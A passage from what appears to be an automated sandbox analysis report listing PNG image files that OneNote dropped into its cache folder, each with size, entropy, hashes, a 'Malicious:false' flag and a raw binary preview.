                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
